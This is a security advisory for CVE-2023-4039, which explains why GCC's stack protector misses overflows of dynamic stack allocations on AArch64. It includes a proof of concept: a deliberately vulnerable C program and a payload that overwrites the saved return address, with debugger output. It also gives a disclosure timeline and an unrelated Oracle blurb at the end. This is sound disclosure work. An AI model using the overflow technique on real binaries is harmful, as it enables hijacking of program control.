Headline
CVE-2023-4039: GCC's -fstack-protector fails to guard dynamic stack allocations on ARM64
A failure in the -fstack-protector feature in GCC-based toolchains that target AArch64 allows an attacker to exploit an existing buffer overflow in dynamically-sized local variables in your application without this being detected. This stack-protector failure only applies to C99-style dynamically-sized local variables or those created using alloca(). The stack-protector operates as intended for statically-sized local variables.
The default behavior when the stack-protector detects an overflow is to terminate your application, resulting in controlled loss of availability. An attacker who can exploit a buffer overflow without triggering the stack-protector might be able to change program flow control to cause an uncontrolled loss of availability or to go further and affect confidentiality or integrity.
Vulnerability Description
On AArch64 targets, GCC’s stack smashing protection does not detect or defend against overflows of dynamically-sized local variables. In C, dynamically-sized variables include both variable-length arrays and buffers allocated using alloca(). GCC’s AArch64 stack frames place such variables immediately below saved register values like the return address with no intervening stack guard. All versions of GCC that we tested, from 5.4.0 to trunk as of 2023-05-15, are affected.
The reason this happens for AArch64 but not for other GCC targets is because GCC’s AArch64 backend lays out stack frames in an unconventional way: instead of saving the return address at the top of a frame (i.e. at the highest address, pushed before anything else) like most other backends and compilers, it saves it near the bottom of the frame, below the local variables. This comment from GCC’s source documents the frame layout:
/* AArch64 stack frames generated by this compiler look like: ±------------------------------+ | | | incoming stack arguments | | | ±------------------------------+ | | <-- incoming stack pointer (aligned) | callee-allocated save area | | for register varargs | | | ±------------------------------+ | local variables | <-- frame_pointer_rtx | | ±------------------------------+ | padding | \ ±------------------------------+ | | callee-saved registers | | frame.saved_regs_size ±------------------------------+ | | LR’ | | ±------------------------------+ | | FP’ | | ±------------------------------+ |<- hard_frame_pointer_rtx (aligned) | SVE vector registers | | \ ±------------------------------+ | | below_hard_fp_saved_regs_size | SVE predicate registers | / / ±------------------------------+ | dynamic allocation | ±------------------------------+ | padding | ±------------------------------+ | outgoing stack arguments | <-- arg_pointer | | ±------------------------------+ | | <-- stack_pointer_rtx (aligned) */
LR’ is the return address, so named because it’s saved from the LR register, and is the target of nearly all stack smashing attacks. It may then seem like a feature, not a bug, to put it at a lower address than the locals: a contiguous overflow only lets an attacker write to memory past the vulnerable local, so this layout keeps the return address out of their reach! In practice though, the memory immediately past a function’s stack frame is almost always another stack frame (belonging to the calling function) with its own saved LR value that the attacker can manipulate to the same effect.
You may notice that the layout above makes no mention of a stack guard. That’s because GCC’s architecture-independent code treats the stack guard as a local, placing it at the very top of the local area without any input from the target backend. Implicit in that placement is an assumption that locals will always occupy one contiguous region with no saved registers interspersed. But that assumption doesn’t hold on AArch64: as shown in the diagram, dynamic allocations live at the very bottom of the stack frame, below the saved registers, with no intervening guard.
Dynamic allocations are just as susceptible to overflows as other locals. In fact, they’re arguably more susceptible because they’re almost always arrays, whereas fixed locals are often integers, pointers, or other types to which variable-length data is never written. GCC’s own heuristics for when to use a stack guard reflect this, with its man page saying this about -fstack-protector (emphasis ours):
Emit extra code to check for buffer overflows … by adding a guard variable to functions with vulnerable objects. This includes functions that call “alloca”, and functions with buffers larger than or equal to 8 bytes.
Proof of Concept
The following C program is vulnerable to a contiguous stack overflow attack even when compiled with -fstack-protector or -fstack-protector-all:
#include <stdint.h> #include <stdio.h> #include <stdlib.h>
int main(int argc, char **argv) { if (argc != 2) return 1;
// Variable-length array
uint8\_t input\[atoi(argv\[1\])\];
size\_t n \= fread(input, 1, 4096, stdin);
fwrite(input, 1, n, stdout);
return 0;
}
We cross-compiled this program for AArch64 using Arm’s GCC 12.2.Rel1 prebuilt toolchain and then ran it under QEMU, with debugging enabled, on an x86_64 host:
$ aarch64-none-linux-gnu-gcc -fstack-protector-all -O3 -static -Wall -Wextra -pedantic -o example-dynamic example-dynamic.c
$ echo -n 'DDDDDDDDPPPPPPPPFFFFFFFFAAAAAAAA' | qemu-aarch64 -g 5555 example-dynamic 8
We ask the program to make a dynamic allocation of size 8, which GCC rounds up to 16. The exploit payload mirrors the stack layout, with the eight "D"s representing the non-overflowing data, the eight "P"s padding out the actual allocation, the eight "F"s overwriting the saved frame pointer, and the eight "A"s overwriting the saved return address.
Attaching a debugger and resuming the program results in an immediate segfault with PC set to the address from our payload, showing we have full control over execution flow despite the stack guard:
$ gdb example-dynamic
GNU gdb (GDB) Fedora Linux 13.1-3.fc37
<snip>
(gdb) target remote :5555
Remote debugging using :5555
<snip>
(gdb) continue
Continuing.
Program received signal SIGBUS, Bus error.
0x0041414141414141 in ?? ()
(gdb) print/a $pc
$1 = 0x41414141414141
For comparison, the following program, which uses a fixed allocation of size 8 instead of a dynamic one, detects the overflow correctly (the "G"s in the payload overwrite the guard):
#include <stdint.h> #include <stdio.h> #include <stdlib.h>
int main(void) { uint8_t input[8];
size\_t n \= fread(input, 1, 4096, stdin);
fwrite(input, 1, n, stdout);
return 0;
}
$ aarch64-none-linux-gnu-gcc -fstack-protector-all -O3 -static -Wall -Wextra -pedantic -o example-static example-static.c
$ echo -n 'DDDDDDDDGGGGGGGG' | qemu-aarch64 example-static
*** stack smashing detected ***: terminated
Aborted (core dumped)
Timeline
- April 27th, 2023: During an Azeria Labs ARM exploitation training, we notice that one of the demo binaries has a misplaced stack canary and investigate the cause.
- May 31st, 2023: We disclose the issue privately to Arm, as GCC has no security contact and every MAINTAINER of GCC’s AArch64 backend is Arm-affiliated.
- May 31st, 2023: Arm’s Product Security Incident Response Team acknowledges and triages the report.
- June 1st, 2023: Arm confirms that the report is valid and asks if we intend to issue a CVE or if they should. We respond that we prefer the latter.
- July 13th, 2023: We remind Arm that the 90-day disclosure window is nearly halfway past and ask for a progress update.
- August 1st, 2023: Arm indicates they have a fix ready and requests a call with Meta to discuss coordinated disclosure.
- August 3rd, 2023: Arm and RTX meet. Arm proposes notifying distros and hyperscale partners prior to public disclosure. Meta agrees to that plan.
- August 21st, 2023: Arm and RTX meet again to finalize the disclosure timeline. We agree to make all advisories and patches public on August 29th, 90 days after RTX’s initial report, unless any of Arm’s partners request an extension.
- August 23rd, 2023: One of Arm’s partners requests disclosure be postponed by a week, so we set the new date to September 5th.
- August 30th, 2023: Arm notifies us that a compiler partner found a weakness in the patched mitigation and that they’ll need to revise their patch. We agree to postpone disclosure by another week, to September 12th, to allow time for that.
- September 12th, 2023: RTX’s blog post, Arm’s security advisory, CVE-2023-4039, and patches on GCC’s mailing list all go live simultaneously.
Related news
Vulnerability in the Sun ZFS Storage Appliance product of Oracle Systems (component: Core). The supported version that is affected is 8.8.60. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Sun ZFS Storage Appliance. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Sun ZFS Storage Appliance. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).